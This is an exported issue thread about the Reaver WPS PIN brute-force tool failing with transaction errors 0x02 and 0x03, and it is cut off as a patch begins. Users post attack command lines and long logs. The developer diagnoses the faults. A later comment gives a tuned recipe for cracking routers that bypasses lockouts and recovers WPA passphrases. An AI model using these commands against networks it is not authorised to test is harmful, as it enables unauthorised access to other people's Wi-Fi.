WPS transaction failed (code: 0x2), and (code: 0x03)

[GoogleCodeExporter]

When attempting to attack WPS Pin mode on wireless router, attacking device 
successfully associates, tries a pin, sends EAPOL Start request, etc all the 
way up until a 'Wps transaction fail code 0x02' is shown. It will cycle between 
this error and another error verbatim, except the error code is 0x03 No keys 
are actually successfully tested: It will stay on the first key indefinitely. 

Scenario - Setup a Netgear WNR2000 wireless router with WPS Pin mode enabled, 
running wpa2 psk.

The laptop running reaver-wps rev 110 from svn, is running backtrack 5 R1 with 
newer compat-wireless drivers after the first few attempts failed 
(compat-wireless-2012-01-22 is what i am now using). I have also tried multiple 
wireless cards (usb ralink RT2860, internal chipset that is also a ralink 
RT2860 using rt2800pci and another usb ralink 2573 using rt73usb - All of which 
i noticed have been reported to be working) , all of which can inject 
successfully to the wireless access point (Yes. It is in monitor mode.) Signal 
strength is -120dB (The laptop and wireless router are actually on the same 
desk, i have also tried moving further away from the AP in case of 
interference, turned off other access points in the same house - only one other 
AP is in use here, it's for personal internet, NOT using WPS:) )

What do i think the issue is? I'm not sure if it's either a issue in my set up 
- my wireless cards (perhaps they are having issues with this attack, even 
though they support injection mode and have worked fine for breaking WEP, 
WPA1/2 and have been thoroughly used for the last year), or possibly the 
wireless router I have used either blocks this sort of attack, or is not 
handling WPS as per spec. I have also tested with a borrowed wireless AP (Older 
thomson TG782T), both have reported to be running WPS 1.0 according to WASH, 
although i am not sure about the thomson being configured to be used for WPS 
Pin.  

The commandline string used is as follows:
<Against Netgear WNR2000>
reaver -i mon1 -b 00:1F:33:F7:EA:59 -vv -a
<Against old thomson TG782T>
^same as above, except seperate address

Have also tried giving it my adapters mac address with -m (just for testing)
have tried with and without -a, sometimes experimenting with --win7 too.

The output from reaver is as follows:
[+] Waiting for beacon from 00:1F:33:F7:EA:59
[+] Switching mon2 to channel 1
[+] Associated with 00:1F:33:F7:EA:59 (ESSID: PEN_LAB_01)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-01-23 15:54:52 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
<It goes on for another 300 lines, i can attach those too if you'd like>

Also, the output of WASH is as follows:
BSSID                  Channel       RSSI       WPS Version       WPS Locked    
    ESSID
--------------------------------------------------------------------------------
-------------------------------
08:76:FF:0F:E6:5A       1            -54        1.0               No            
    BigPond0FE65A
00:1F:33:F7:EA:59       1            -39        1.0               No            
    PEN_LAB_01
 <sorry about the formatting!>

-Unfortunatly i'm getting a message about issue attachment storage quota 
exceeded, so I cannot post a pcap dump here. Would it be acceptable if I posted 
on my own webserver and provided a link?

<PS, sorry for the essay. I've tried a bit to get this to work!>

Original issue reported on code.google.com by m...@c0refailure.com on 23 Jan 2012 at 5:03

[GoogleCodeExporter]

I'm hoping the '-120db' is a typo and you really mean -12db if they're sitting 
on the same desk. :)

Yes, we have to clean up all the attachments on the project, Google limits it 
to 50MB I believe. You can post a link to wherever you want to upload the pcap, 
or email it to me directly, whichever you prefer. 

The 0x02 and 0x03 codes are just re-iterating the messages that you are already 
seeing: receive timeouts and out of order packets respectively. Without seeing 
the pcap it's hard to say what the problem might be, but you might try the 
--no-nacks option which will prevent Reaver from instantly NACKing out of order 
packets. 

Original comment by cheff...@tacnetsol.com on 23 Jan 2012 at 5:36

[GoogleCodeExporter]

ohmy! Yes, that's a typo!:)
I have uploaded the pcap to http://c0refailure.com/reaver-issues.zip 
However, after adding the command line --no-nacks, the attack *appears* to be 
working! It is definitely iterating through pins, albeit at a rate of 4 
seconds/pin.
Would it be of use if i attached pcap of the attack with the --no-nacks option?

Original comment by m...@c0refailure.com on 23 Jan 2012 at 11:44

[GoogleCodeExporter]

I've seen some APs that blast out M1 packets until they get an M2 response, 
instead of just sending one M1 packet and waiting. The result is that Reaver 
sends the M2, but then gets another M1 packet and thinks something has gone 
wrong, kills the session, and starts over. The --no-nacks disables this logic, 
so I suspect that's what was happening with your AP.  

Original comment by cheff...@tacnetsol.com on 23 Jan 2012 at 12:56

[GoogleCodeExporter]

Unfortunately, I also experience similar problems:

[+] Trying pin 01405675
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin

If I specify -d 5, it seems to work (@ 7 seconds/pin speed). With a lower value 
than 5 it fails (as above).

Using Reaver 1.4 on BT5R1 with stock/latest compat-wireless (tested 
patched/non-patched too), USB wireless adapter with ath9k_htc driver and latest 
firmware (1.3). The target AP is a linksys. wash output is OK.

Original comment by jo...@tracid.ro on 23 Jan 2012 at 1:50

[GoogleCodeExporter]

jozsi: I've run in to similar problems, some APs just can't handle faster 
attempts. Out of curiosity, what model Linksys is it?

Original comment by cheff...@tacnetsol.com on 23 Jan 2012 at 2:14

[GoogleCodeExporter]

It's a WRT160N with stock firmware.

Original comment by jo...@tracid.ro on 23 Jan 2012 at 2:16

[GoogleCodeExporter]

Unfortunately, after some time I start getting:

[+] Trying pin 13305673
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 13315672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 13315672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 12.18% complete @ 2012-01-23 11:20:23 (7 seconds/pin)
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
...snip...

[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

Original comment by jo...@tracid.ro on 23 Jan 2012 at 4:24

[GoogleCodeExporter]

jozsi, how long does this last? Does it recover and start trying pins again?

Original comment by cheff...@tacnetsol.com on 23 Jan 2012 at 4:41

[GoogleCodeExporter]

I notice the same issue on several APs after upgrade to reaver 1.4.  With 
reaver 1.3 all these APs were easily attackable but now it just loops on one 
PIN number.

I even tried supplying a known PIN under reaver 1.4 and no luck in attacking 
WPS even when the PIN in known.  Here is the output:

root@root:~/reaver-1.4/src# reaver -i mon0 -vv -b 00:18:E7:E7:59:4E -c 1 
--pin=60251749

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 00:18:E7:E7:59:4E
[+] Associated with 00:18:E7:E7:59:4E (ESSID: dlink)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 90.95% complete @ 2012-01-23 08:48:46 (9 seconds/pin)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90.99% complete @ 2012-01-23 08:49:16 (7 seconds/pin)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
^C

It seems something has gone wrong in this release of reaver.

Original comment by kbus...@gmail.com on 23 Jan 2012 at 7:18

[GoogleCodeExporter]

kbuster: I just ran the 1.4 release version of Reaver from two separate 
machines using two different cards (rtl8187 and ath9k) against two different 
APs and specifying the pin worked for me:

reaver@reaver:~/Downloads/reaver-1.4/src$ sudo ./reaver -i mon0 -b 
54:E6:FC:9A:12:50 -vv --pin=09030879 -c 9

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from 54:E6:FC:9A:12:50
[+] Associated with 54:E6:FC:9A:12:50 (ESSID: TP-LINK_9A1250)
[+] Trying pin 09030879
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '09030879'
[+] WPA PSK: 'super secret passphrase'
[+] AP SSID: 'TP-LINK_9A1250'

Specifying the wrong pin results in the same output that you are getting. Since 
you said 1.3 worked on these same APs before, what output do you get when 
running 1.3 with the --pin option specified?

Original comment by cheff...@tacnetsol.com on 23 Jan 2012 at 7:42

[GoogleCodeExporter]

Craig: indeed, it does recover itself within ~4 minutes. I'll post back if I 
encounter a case when self-recover fails.

Original comment by jo...@tracid.ro on 23 Jan 2012 at 8:17

[GoogleCodeExporter]

Thanks jozsi. What sometimes happens is the WPS state machine in the AP gets 
out of sync and you have to wait a few minutes for it to reset it self and 
start accepting new pins again.

Original comment by cheff...@tacnetsol.com on 23 Jan 2012 at 8:23

[GoogleCodeExporter]

I have noticed this resetting issue in a NETGEAR AP I tested on. Found out it 
accepted/replied on precisely 29 pins, then gave me timeouts/failures on the 
30th attempted pin, for exactly 5 minutes (I found out by using -x298), after 
which it would start accepting pin-requests again.

But then a strange thing happend;
After having successfully tried ~40% of all pins on this AP, WPS crashed (I got 
only timeouts after that), while leaving everything else on the modem/router/AP 
in tact, which seemed very unusual to me. This shows that WPS is a totally 
separated process on this modem/AP. Even VPN configs, NAT-bypasses, all sorts 
of complex configs on this AP, were still fully functional!
Only a hard reboot (power on-off-on) re-enstated the WPS functionality of this 
NETGEAR modem.

Original comment by jul...@gmail.com on 24 Jan 2012 at 10:50

[GoogleCodeExporter]

I have noticed with the netgear WNR2000 that it locks after a very few 
amount of tests (i'll have to check after work, but from memory it was 
well less than 30!), then locked itself out for a period too. I did 
notice that reaver did not continue the attack, and that i had to 
restard reaver for the attack to continue.

Original comment by m...@c0refailure.com on 25 Jan 2012 at 2:17

[GoogleCodeExporter]

Hello,
I tested my linksys WAP610N AP, but i didn't success. I used TPLINK WN321G USB 
Wireless card, it's supported monitoring mode and packet injection. Usually i'm 
using it for wireless cracking.

Do you have any idea for this issue ?..

# reaver -i mon0 --pin=71331818 -b 38:CC:21:B9:75:23  -c 11 -vv --no-nack -d 5 
-f -x298

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 38:CC:21:B9:75:23 
[+] Associated with 38:CC:21:B9:75:23  (ESSID: Test_Network)
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK

Original comment by audience...@gmail.com on 31 Jan 2012 at 10:21

[GoogleCodeExporter]

Found this today thought I would share 
http://support.netgear.com/app/answers/detail/a_id/19824
"Netgear home routers will protect themselves after several failed attempts to 
authenticate as an external registrar by entering a lock-down state. During the 
lock-down state, all WPS attempts using the Router PIN will not work. The 
router will return from the lock-down state after a predetermined time period. "

I think we need to dial in on that predetermined time.

Original comment by SuperSeo...@gmail.com on 9 Feb 2012 at 11:11

[GoogleCodeExporter]

I'm using ALfa rtl8187. reaver 1.4

found this way to make it work

1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7

hope this help ;)

Original comment by itmanvn on 12 Feb 2012 at 2:46

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

ran into this issue with latest reaver from git sources.

Original comment by gentooli...@gmail.com on 1 May 2012 at 8:37

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

I pretty much end up with this same listing of messages, over and over, never 
moving forward on the pin attempts.

reaver -i mon0 -b BSSID -vv -x 60

[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin

Then it starts over again. Have tried with the --no-nack also, does not seem to 
make a difference.

Original comment by g00gl3c...@gmail.com on 9 May 2012 at 8:24

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

I have run into this problem repeatedly and I think I've figured it out. First 
of all, I would recommend that everyone read the documentation on reaver on 
code.google.com (i.e.  Resources, FAQ, HintsAndTips, SupportedWirelessDrivers, 
and README documents at  http://code.google.com/p/reaver-wps/w/list ). These 
documents are extremely informative. The commands below have worked on the last 
5 routers that I have successfully cracked. Cracking wpa2 is a bit of an 
artform. You have to feel out each router. Sometimes routers simply don't like 
having the default 1 second delay between pin attempts. I had one router that 
gave me error code 0x02 consistently, until I changed the delay time to 60 
seconds! (i.e. "-d 60").. Any less than 60 seconds and it would give me a code 
0x02 error. Another router I was working on didn't like the default timeout 
period for receiving the M5 and M7 WPS response messages which is 0.1 seconds 
so I changed the default timeout to  0.5 seconds (i.e. "-T .5") and it was 
running flawlessly.

reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 
360
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 5 -r 3:5 -T .5 -x 360
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x 
360

"-i mon0" obviously you'll need to specifiy the interface.

"-c 11" I find that specifying the channel stops reaver from needlessly channel 
surfing in this example I used channel 11.

"-b 00:01:02:03:04:05" this is the bssid which is another required arguement in 
reaver.

"-vv" This is the verbose option. Unlike the original verbose (i.e. "-v") this 
option provides twice the orignal verbosity. I honestly prefer the "-v" option, 
since I rarely run into errors as of late.

"-S" this option instructs reaver to use small diffie-hellman secret numbers. 
These are pins that are common to most manufacturers of routers. In Switzerland 
for example, nearly all of the routers use the same standard wps pin number and 
this option checks for these kind of pins.

"-N" this is the "no nacks" option. Its one less packet to capture and can 
shorten the time it takes to crack the network.

"-L" this option ignores locks

"-d 15" This is the delay time between pin attempts. Most routers like 15 
seconds, but some are fine with 5 seconds and I've had one as high as 60 
seconds.

"-r 3:15" this says that after 3 attempts sleep for 15 seconds. This lets the 
router cool off for a bit between attacks.

"-T .5" This is the timeout period for receiving the M5 and M7 response 
message. The default timeout is 0.1 seconds. I find that using .5 seconds is 
sometimes preferred by some routers. You can set this option to as high as 1 
second.

"-x 360" this option makes reaver sleep for 6 minutes if you get 10 failed 
attempts in a row. This gives the router some time to cool off before you 
resume your attack.

ADDITIONAL OPTION

"--pin=1234" Without getting too technical the wps pin is essentially validated 
in two halves. Which is nice since the pin number is 8 digits and trying 10^8 
or 100,000,000 different combinations would take years to crack. Since there 
are two halves, however, there are only 4 digits in the first half which is 
10^4 or 10,000 different combinations of pin number. In the second half there 
are only 3 digits which is 10^3 or 1,000 combinations because the fourth digit 
is a checksum(is a binary summation of the first 7 digits that checks for 
errors during transmitting and receiving the signal). Therefore, There are 
11,000 different possible pin numbers. Howver, if at any time reaver reaches 
90% that means that the first 4 digits have been cracked and you should write 
them down, because you can close BT5 and come back later and use this option 
(i.e. "--pin=XXXX") to complete the second half of the pin number. 

reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x 
360 --pin=2095

Furthermore if you crack the entire pin and the password is changed and EVEN IF 
WPS IS TURNED OFF you can enter it as an option in the argument 
"--pin=XXXXXXXX" and it will instantly give you the wpa password.

reaver -i mon0 -b 00:01:02:03:04:05 -vv --pin=12345670

Best of luck and loads of patience. :)

Original comment by Andrew.I...@gmail.com on 14 Jul 2012 at 3:40

[GoogleCodeExporter]

I should add that I was running BT5 R2 KDE (I love KDE. Transparent consoles 
are awesome bc u can see the bssid's in the other consoles. And the konqueror 
browser love it.) in VM Virtualbox with reaver 1.4. Download Virtualbox here 
--> https://www.virtualbox.org/wiki/Downloads ..  And here is a video on how to 
run BT5 in virtualbox: http://www.youtube.com/watch?v=jrdovN-RVWk  

Original comment by Andrew.I...@gmail.com on 14 Jul 2012 at 4:21

[GoogleCodeExporter]

^ @Andrew I tried all of the stuff you posted and variations of it but I still 
get the errors below. Signal strength is -64dB so that shouldn't be the issue. 
It ran perfectly for the first 20-30 mins and then after that all I got was the 
following:

[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 15 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 2.65% complete @ 2012-07-19 04:29:26 (0 seconds/pin)
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 15 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: 10 failed connections in a row
^CSegmentation fault
root@bt:~# reaver -i mon0 -c 6 -b XX:XX:XX:XX:XX:XX -vv -S -N -L -d 30 -r 3:30 
-T .5 -x 360

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[?] Restore previous session for XX:XX:XX:XX:XX:XX? [n/Y] Y
[+] Restored previous session
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Belkin.XX)
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 30 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 2.65% complete @ 2012-07-19 04:37:13 (0 seconds/pin)
[+] Entering recurring delay of 30 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Session saved.

Original comment by ronquil...@gmail.com on 19 Jul 2012 at 5:13

[GoogleCodeExporter]

Andrew - encouraging results from your suggested parameters. Thanks for the 
insight. I'm trialing Reaver on my Sagem AP ('Sky' box). Tricky little bugger, 
particularly as it likes to lock for 60 minutes (literally 3600 seconds) once 
it's spooked. You have to power-off for a few seconds to clear the lock (lock 
state seems to persist console/soft reboot)

Previously, I was running Reaver as follows:

reaver -i mon0 -b 12:34:56:78:90:01 -vv

I've been getting 12 to 20 attempts with that.

However, after introducing -d 15 -r 3:15 and -S, the AP allows for 30 attempts 
before locking. I will continue to play with the parameters, particularly an 
increase in -d 60 as recommended. Luckily, the AP doesn't seem to lock 
permanently as that would be a pain to have to keep going into the console to 
enable it.

Cheers,

bt

Original comment by butttof...@gmail.com on 23 Jul 2012 at 11:27

[GoogleCodeExporter]

Any other tips for 0x02 and 0x04 (with M1 and M2 working) ?

Original comment by ronquil...@gmail.com on 25 Jul 2012 at 9:20

[GoogleCodeExporter]

Here's something that may help anyone who keeps receiving lower-M messages 
after sending a response to the initial message.  While low signal & 
interference obviously play a part, I recently had significant trouble with a 
Netgear router w/~56 RSSI.  Clearly a good signal, but I couldn't rule out 
interference.  However, I was until recently employed for a mobile phone 
manufacturer (yep, the one which just laid of thousands of people) wherein we 
would occasionally have trouble with cell networks that mimic the problem I was 
having with the Netgear router.  Poor signal and interference do not 
necessarily mean the receiving end does not get the message...just that the 
phone and/or tower got responses back faster than they were expecting.  Sorry 
for the lengthy background info, but delays in sending messages was often the 
answer.

I stuck in a 2/10 sec delay after receiving M-messages from the target router 
before sending a response.  The result, for me, was phenomenal.  It has also 
vastly improved cracking times which were previously abysmal on a few other 
routers due to low signal strength.  I should also mention that I included '-d 
3' and '-t 10' to provide more tolerance for interference/low signal strength.  
YMMV with both the message delays and the command line options.  I would be 
interested in hearing others' results though.

So, without further ado, if anyone would like to give this a shot replace the 
contents of 'send.c' with the code pasted below and recompile (make clean, 
configure, make, make install).

/*
 * Reaver - Transmit functions
 * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
 *
 *  This program is free software; you can redistribute it and/or modify
